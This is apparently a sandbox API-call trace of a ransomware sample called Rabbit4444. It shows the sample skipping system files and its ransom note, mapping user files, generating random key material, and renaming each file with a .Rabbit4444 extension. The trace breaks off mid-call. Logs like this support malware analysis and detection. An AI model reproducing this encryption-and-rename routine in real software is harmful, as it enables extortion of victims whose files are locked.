lstrcmpiW (lpString1="4b527fcfd3d393f17e8b4a86227b42d4d6939d69ca21d501e800c129a2c92a43", lpString2="pagefile.sys") returned -1 [0072.000] lstrcmpiW (lpString1="4b527fcfd3d393f17e8b4a86227b42d4d6939d69ca21d501e800c129a2c92a43", lpString2="boot") returned -1 [0072.000] lstrcmpiW (lpString1="4b527fcfd3d393f17e8b4a86227b42d4d6939d69ca21d501e800c129a2c92a43", lpString2="ids.txt") returned -1 [0072.000] lstrcmpiW (lpString1="4b527fcfd3d393f17e8b4a86227b42d4d6939d69ca21d501e800c129a2c92a43", lpString2="NTUSER.DAT") returned -1 [0072.000] lstrcpyW (in: lpString1=0x130ec18, lpString2="4b527fcfd3d393f17e8b4a86227b42d4d6939d69ca21d501e800c129a2c92a43" | out: lpString1="4b527fcfd3d393f17e8b4a86227b42d4d6939d69ca21d501e800c129a2c92a43") returned="4b527fcfd3d393f17e8b4a86227b42d4d6939d69ca21d501e800c129a2c92a43" [0072.000] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\4b527fcfd3d393f17e8b4a86227b42d4d6939d69ca21d501e800c129a2c92a43", dwFileAttributes=0x0) returned 1 [0072.001] lstrlenW (lpString="4b527fcfd3d393f17e8b4a86227b42d4d6939d69ca21d501e800c129a2c92a43") returned 64 [0072.001] lstrlenW (lpString="Rabbit4444") returned 10 [0072.001] lstrcmpiW (lpString1="29a2c92a43", lpString2="Rabbit4444") returned -1 [0072.001] lstrlenW (lpString=".dll") returned 4 [0072.001] lstrcmpiW (lpString1="2a43", lpString2=".dll") returned 1 [0072.001] lstrlenW (lpString=".lnk") returned 4 [0072.001] lstrcmpiW (lpString1="2a43", lpString2=".lnk") returned 1 [0072.001] lstrlenW (lpString=".ini") returned 4 [0072.001] lstrcmpiW (lpString1="2a43", lpString2=".ini") returned 1 [0072.001] lstrlenW (lpString=".sys") returned 4 [0072.001] lstrcmpiW (lpString1="2a43", lpString2=".sys") returned 1 [0072.001] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\4b527fcfd3d393f17e8b4a86227b42d4d6939d69ca21d501e800c129a2c92a43" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\assets\\4b527fcfd3d393f17e8b4a86227b42d4d6939d69ca21d501e800c129a2c92a43"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0072.001] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0072.001] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=16331216542) returned 1 [0072.001] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1011) returned 1 [0072.002] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117b30 [0072.002] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101d98 [0072.002] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x700, lpName=0x0) returned 0x27c [0072.003] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x700) returned 0x80000 [0072.004] CryptAcquireContextW (in: phProv=0x130bbd0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x130bbd0*=0x101848) returned 1 [0072.005] CryptGenRandom (in: hProv=0x101848, dwLen=0x80, pbBuffer=0x130bbec | out: pbBuffer=0x130bbec) returned 1 [0072.005] CryptReleaseContext (hProv=0x101848, dwFlags=0x0) returned 1 [0072.005] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x110cf0 [0072.005] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0072.005] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x110cf0 | out: hHeap=0xe0000) returned 1 [0072.005] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0072.005] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x115180 [0072.005] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0072.005] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x115180 | out: hHeap=0xe0000) returned 1 [0072.005] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0072.005] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=16331593971) returned 1 [0072.005] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117b30 | out: hHeap=0xe0000) returned 1 [0072.006] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101d98 | out: hHeap=0xe0000) returned 1 [0072.006] UnmapViewOfFile (lpBaseAddress=0x80000) returned 1 [0072.006] CloseHandle (hObject=0x27c) returned 1 [0072.006] CloseHandle (hObject=0x260) returned 1 [0072.006] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\4b527fcfd3d393f17e8b4a86227b42d4d6939d69ca21d501e800c129a2c92a43.Rabbit4444") returned 187 [0072.006] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\4b527fcfd3d393f17e8b4a86227b42d4d6939d69ca21d501e800c129a2c92a43" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\assets\\4b527fcfd3d393f17e8b4a86227b42d4d6939d69ca21d501e800c129a2c92a43"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\4b527fcfd3d393f17e8b4a86227b42d4d6939d69ca21d501e800c129a2c92a43.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\assets\\4b527fcfd3d393f17e8b4a86227b42d4d6939d69ca21d501e800c129a2c92a43.rabbit4444"), dwFlags=0x1) returned 1 [0072.007] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x861c3423, ftCreationTime.dwHighDateTime=0x1d327b4, ftLastAccessTime.dwLowDateTime=0x861c3423, ftLastAccessTime.dwHighDateTime=0x1d327b4, ftLastWriteTime.dwLowDateTime=0x86ada3d2, ftLastWriteTime.dwHighDateTime=0x1d327b4, nFileSizeHigh=0x0, nFileSizeLow=0x1f092e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="4d3461b53f801f1aad635b7ee4b053a6a3b9948398394a53d751dff438e02dac", cAlternateFileName="4D3461~1")) returned 1 [0072.007] lstrcmpiW (lpString1="4d3461b53f801f1aad635b7ee4b053a6a3b9948398394a53d751dff438e02dac", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0072.007] lstrcmpiW (lpString1="4d3461b53f801f1aad635b7ee4b053a6a3b9948398394a53d751dff438e02dac", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0072.007] lstrcmpiW (lpString1="4d3461b53f801f1aad635b7ee4b053a6a3b9948398394a53d751dff438e02dac", lpString2="Rabbit4444.exe") returned -1 [0072.007] lstrcmpiW (lpString1="4d3461b53f801f1aad635b7ee4b053a6a3b9948398394a53d751dff438e02dac", lpString2=".") returned 1 [0072.007] lstrcmpiW (lpString1="4d3461b53f801f1aad635b7ee4b053a6a3b9948398394a53d751dff438e02dac", lpString2="..") returned 1 [0072.007] lstrcmpiW (lpString1="4d3461b53f801f1aad635b7ee4b053a6a3b9948398394a53d751dff438e02dac", lpString2="windows") returned -1 [0072.007] lstrcmpiW (lpString1="4d3461b53f801f1aad635b7ee4b053a6a3b9948398394a53d751dff438e02dac", lpString2="bootmgr") returned -1 [0072.007] lstrcmpiW (lpString1="4d3461b53f801f1aad635b7ee4b053a6a3b9948398394a53d751dff438e02dac", lpString2="pagefile.sys") returned -1 [0072.007] lstrcmpiW (lpString1="4d3461b53f801f1aad635b7ee4b053a6a3b9948398394a53d751dff438e02dac", lpString2="boot") returned -1 [0072.007] lstrcmpiW (lpString1="4d3461b53f801f1aad635b7ee4b053a6a3b9948398394a53d751dff438e02dac", lpString2="ids.txt") returned -1 [0072.007] lstrcmpiW (lpString1="4d3461b53f801f1aad635b7ee4b053a6a3b9948398394a53d751dff438e02dac", lpString2="NTUSER.DAT") returned -1 [0072.007] lstrcpyW (in: lpString1=0x130ec18, lpString2="4d3461b53f801f1aad635b7ee4b053a6a3b9948398394a53d751dff438e02dac" | out: lpString1="4d3461b53f801f1aad635b7ee4b053a6a3b9948398394a53d751dff438e02dac") returned="4d3461b53f801f1aad635b7ee4b053a6a3b9948398394a53d751dff438e02dac" [0072.007] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\4d3461b53f801f1aad635b7ee4b053a6a3b9948398394a53d751dff438e02dac", dwFileAttributes=0x0) returned 1 [0072.007] lstrlenW (lpString="4d3461b53f801f1aad635b7ee4b053a6a3b9948398394a53d751dff438e02dac") returned 64 [0072.007] lstrlenW (lpString="Rabbit4444") returned 10 [0072.007] lstrcmpiW (lpString1="f438e02dac", lpString2="Rabbit4444") returned -1 [0072.007] lstrlenW (lpString=".dll") returned 4 [0072.007] lstrcmpiW (lpString1="2dac", lpString2=".dll") returned 1 [0072.007] lstrlenW (lpString=".lnk") returned 4 [0072.007] lstrcmpiW (lpString1="2dac", lpString2=".lnk") returned 1 [0072.007] lstrlenW (lpString=".ini") returned 4 [0072.007] lstrcmpiW (lpString1="2dac", lpString2=".ini") returned 1 [0072.007] lstrlenW (lpString=".sys") returned 4 [0072.008] lstrcmpiW (lpString1="2dac", lpString2=".sys") returned 1 [0072.008] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\4d3461b53f801f1aad635b7ee4b053a6a3b9948398394a53d751dff438e02dac" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\assets\\4d3461b53f801f1aad635b7ee4b053a6a3b9948398394a53d751dff438e02dac"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0072.008] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0072.008] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=16331871655) returned 1 [0072.008] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=2033966) returned 1 [0072.008] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0072.008] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102150 [0072.008] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1f0c30, lpName=0x0) returned 0x27c [0072.014] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1f0c30) returned 0x3110000 [0072.064] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x111008 [0072.064] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0072.064] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x111008 | out: hHeap=0xe0000) returned 1 [0072.064] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109028 [0072.064] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x115180 [0072.064] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109028 | out: hHeap=0xe0000) returned 1 [0072.064] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x115180 | out: hHeap=0xe0000) returned 1 [0072.064] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0072.064] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=16337509233) returned 1 [0072.064] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0072.064] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102150 | out: hHeap=0xe0000) returned 1 [0072.064] UnmapViewOfFile (lpBaseAddress=0x3110000) returned 1 [0072.129] CloseHandle (hObject=0x27c) returned 1 [0072.129] CloseHandle (hObject=0x260) returned 1 [0072.129] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\4d3461b53f801f1aad635b7ee4b053a6a3b9948398394a53d751dff438e02dac.Rabbit4444") returned 187 [0072.129] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\4d3461b53f801f1aad635b7ee4b053a6a3b9948398394a53d751dff438e02dac" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\assets\\4d3461b53f801f1aad635b7ee4b053a6a3b9948398394a53d751dff438e02dac"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\4d3461b53f801f1aad635b7ee4b053a6a3b9948398394a53d751dff438e02dac.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\assets\\4d3461b53f801f1aad635b7ee4b053a6a3b9948398394a53d751dff438e02dac.rabbit4444"), dwFlags=0x1) returned 1 [0072.131] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb2877956, ftCreationTime.dwHighDateTime=0x1d336c5, ftLastAccessTime.dwLowDateTime=0xb2877956, ftLastAccessTime.dwHighDateTime=0x1d336c5, ftLastWriteTime.dwLowDateTime=0xb39994e8, ftLastWriteTime.dwHighDateTime=0x1d336c5, nFileSizeHigh=0x0, nFileSizeLow=0x8dfaa, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="53065cdcbb941597a827a5c29535d7ac11257106578b6a09580177978db66e3b", cAlternateFileName="53065C~1")) returned 1 [0072.131] lstrcmpiW (lpString1="53065cdcbb941597a827a5c29535d7ac11257106578b6a09580177978db66e3b", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0072.131] lstrcmpiW (lpString1="53065cdcbb941597a827a5c29535d7ac11257106578b6a09580177978db66e3b", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0072.131] lstrcmpiW (lpString1="53065cdcbb941597a827a5c29535d7ac11257106578b6a09580177978db66e3b", lpString2="Rabbit4444.exe") returned -1 [0072.131] lstrcmpiW (lpString1="53065cdcbb941597a827a5c29535d7ac11257106578b6a09580177978db66e3b", lpString2=".") returned 1 [0072.131] lstrcmpiW (lpString1="53065cdcbb941597a827a5c29535d7ac11257106578b6a09580177978db66e3b", lpString2="..") returned 1 [0072.131] lstrcmpiW (lpString1="53065cdcbb941597a827a5c29535d7ac11257106578b6a09580177978db66e3b", lpString2="windows") returned -1 [0072.131] lstrcmpiW (lpString1="53065cdcbb941597a827a5c29535d7ac11257106578b6a09580177978db66e3b", lpString2="bootmgr") returned -1 [0072.131] lstrcmpiW (lpString1="53065cdcbb941597a827a5c29535d7ac11257106578b6a09580177978db66e3b", lpString2="pagefile.sys") returned -1 [0072.131] lstrcmpiW (lpString1="53065cdcbb941597a827a5c29535d7ac11257106578b6a09580177978db66e3b", lpString2="boot") returned -1 [0072.131] lstrcmpiW (lpString1="53065cdcbb941597a827a5c29535d7ac11257106578b6a09580177978db66e3b", lpString2="ids.txt") returned -1 [0072.131] lstrcmpiW (lpString1="53065cdcbb941597a827a5c29535d7ac11257106578b6a09580177978db66e3b", lpString2="NTUSER.DAT") returned -1 [0072.131] lstrcpyW (in: lpString1=0x130ec18, lpString2="53065cdcbb941597a827a5c29535d7ac11257106578b6a09580177978db66e3b" | out: lpString1="53065cdcbb941597a827a5c29535d7ac11257106578b6a09580177978db66e3b") returned="53065cdcbb941597a827a5c29535d7ac11257106578b6a09580177978db66e3b" [0072.131] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\53065cdcbb941597a827a5c29535d7ac11257106578b6a09580177978db66e3b", dwFileAttributes=0x0) returned 1 [0072.132] lstrlenW (lpString="53065cdcbb941597a827a5c29535d7ac11257106578b6a09580177978db66e3b") returned 64 [0072.132] lstrlenW (lpString="Rabbit4444") returned 10 [0072.132] lstrcmpiW (lpString1="978db66e3b", lpString2="Rabbit4444") returned -1 [0072.132] lstrlenW (lpString=".dll") returned 4 [0072.132] lstrcmpiW (lpString1="6e3b", lpString2=".dll") returned 1 [0072.132] lstrlenW (lpString=".lnk") returned 4 [0072.132] lstrcmpiW (lpString1="6e3b", lpString2=".lnk") returned 1 [0072.132] lstrlenW (lpString=".ini") returned 4 [0072.132] lstrcmpiW (lpString1="6e3b", lpString2=".ini") returned 1 [0072.132] lstrlenW (lpString=".sys") returned 4 [0072.132] lstrcmpiW (lpString1="6e3b", lpString2=".sys") returned 1 [0072.132] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\53065cdcbb941597a827a5c29535d7ac11257106578b6a09580177978db66e3b" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\assets\\53065cdcbb941597a827a5c29535d7ac11257106578b6a09580177978db66e3b"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0072.133] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0072.133] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=16344347805) returned 1 [0072.133] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=581546) returned 1 [0072.133] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117860 [0072.133] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1018d0 [0072.133] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x8e2b0, lpName=0x0) returned 0x27c [0072.135] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x8e2b0) returned 0x2b0000 [0072.155] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x1108d0 [0072.155] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0072.155] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1108d0 | out: hHeap=0xe0000) returned 1 [0072.155] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0072.155] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x115180 [0072.155] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0072.155] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x115180 | out: hHeap=0xe0000) returned 1 [0072.155] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0072.155] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=16346624349) returned 1 [0072.156] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117860 | out: hHeap=0xe0000) returned 1 [0072.156] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1018d0 | out: hHeap=0xe0000) returned 1 [0072.156] UnmapViewOfFile (lpBaseAddress=0x2b0000) returned 1 [0072.161] CloseHandle (hObject=0x27c) returned 1 [0072.161] CloseHandle (hObject=0x260) returned 1 [0072.161] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\53065cdcbb941597a827a5c29535d7ac11257106578b6a09580177978db66e3b.Rabbit4444") returned 187 [0072.161] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\53065cdcbb941597a827a5c29535d7ac11257106578b6a09580177978db66e3b" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\assets\\53065cdcbb941597a827a5c29535d7ac11257106578b6a09580177978db66e3b"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\53065cdcbb941597a827a5c29535d7ac11257106578b6a09580177978db66e3b.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\assets\\53065cdcbb941597a827a5c29535d7ac11257106578b6a09580177978db66e3b.rabbit4444"), dwFlags=0x1) returned 1 [0072.162] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82307515, ftCreationTime.dwHighDateTime=0x1d327b4, ftLastAccessTime.dwLowDateTime=0x82307515, ftLastAccessTime.dwHighDateTime=0x1d327b4, ftLastWriteTime.dwLowDateTime=0x83ebeafc, ftLastWriteTime.dwHighDateTime=0x1d327b4, nFileSizeHigh=0x0, nFileSizeLow=0xd53, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="53e3fbcae3ecf59049f0a1751d56cd9e4bd29256fdf5be6708489d94d0256f30", cAlternateFileName="53E3FB~1")) returned 1 [0072.162] lstrcmpiW (lpString1="53e3fbcae3ecf59049f0a1751d56cd9e4bd29256fdf5be6708489d94d0256f30", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0072.163] lstrcmpiW (lpString1="53e3fbcae3ecf59049f0a1751d56cd9e4bd29256fdf5be6708489d94d0256f30", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0072.163] lstrcmpiW (lpString1="53e3fbcae3ecf59049f0a1751d56cd9e4bd29256fdf5be6708489d94d0256f30", lpString2="Rabbit4444.exe") returned -1 [0072.163] lstrcmpiW (lpString1="53e3fbcae3ecf59049f0a1751d56cd9e4bd29256fdf5be6708489d94d0256f30", lpString2=".") returned 1 [0072.163] lstrcmpiW (lpString1="53e3fbcae3ecf59049f0a1751d56cd9e4bd29256fdf5be6708489d94d0256f30", lpString2="..") returned 1 [0072.163] lstrcmpiW (lpString1="53e3fbcae3ecf59049f0a1751d56cd9e4bd29256fdf5be6708489d94d0256f30", lpString2="windows") returned -1 [0072.163] lstrcmpiW (lpString1="53e3fbcae3ecf59049f0a1751d56cd9e4bd29256fdf5be6708489d94d0256f30", lpString2="bootmgr") returned -1 [0072.163] lstrcmpiW (lpString1="53e3fbcae3ecf59049f0a1751d56cd9e4bd29256fdf5be6708489d94d0256f30", lpString2="pagefile.sys") returned -1 [0072.163] lstrcmpiW (lpString1="53e3fbcae3ecf59049f0a1751d56cd9e4bd29256fdf5be6708489d94d0256f30", lpString2="boot") returned -1 [0072.163] lstrcmpiW (lpString1="53e3fbcae3ecf59049f0a1751d56cd9e4bd29256fdf5be6708489d94d0256f30", lpString2="ids.txt") returned -1 [0072.163] lstrcmpiW (lpString1="53e3fbcae3ecf59049f0a1751d56cd9e4bd29256fdf5be6708489d94d0256f30", lpString2="NTUSER.DAT") returned -1 [0072.163] lstrcpyW (in: lpString1=0x130ec18, lpString2="53e3fbcae3ecf59049f0a1751d56cd9e4bd29256fdf5be6708489d94d0256f30" | out: lpString1="53e3fbcae3ecf59049f0a1751d56cd9e4bd29256fdf5be6708489d94d0256f30") returned="53e3fbcae3ecf59049f0a1751d56cd9e4bd29256fdf5be6708489d94d0256f30" [0072.163] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\53e3fbcae3ecf59049f0a1751d56cd9e4bd29256fdf5be6708489d94d0256f30", dwFileAttributes=0x0) returned 1 [0072.163] lstrlenW (lpString="53e3fbcae3ecf59049f0a1751d56cd9e4bd29256fdf5be6708489d94d0256f30") returned 64 [0072.163] lstrlenW (lpString="Rabbit4444") returned 10 [0072.163] lstrcmpiW (lpString1="94d0256f30", lpString2="Rabbit4444") returned -1 [0072.163] lstrlenW (lpString=".dll") returned 4 [0072.163] lstrcmpiW (lpString1="6f30", lpString2=".dll") returned 1 [0072.163] lstrlenW (lpString=".lnk") returned 4 [0072.163] lstrcmpiW (lpString1="6f30", lpString2=".lnk") returned 1 [0072.163] lstrlenW (lpString=".ini") returned 4 [0072.163] lstrcmpiW (lpString1="6f30", lpString2=".ini") returned 1 [0072.163] lstrlenW (lpString=".sys") returned 4 [0072.163] lstrcmpiW (lpString1="6f30", lpString2=".sys") returned 1 [0072.163] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\53e3fbcae3ecf59049f0a1751d56cd9e4bd29256fdf5be6708489d94d0256f30" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\assets\\53e3fbcae3ecf59049f0a1751d56cd9e4bd29256fdf5be6708489d94d0256f30"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0072.164] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0072.164] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=16347494325) returned 1 [0072.164] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=3411) returned 1 [0072.164] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117860 [0072.164] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101ea8 [0072.164] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1060, lpName=0x0) returned 0x27c [0072.165] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1060) returned 0x80000 [0072.167] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x1106c0 [0072.167] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 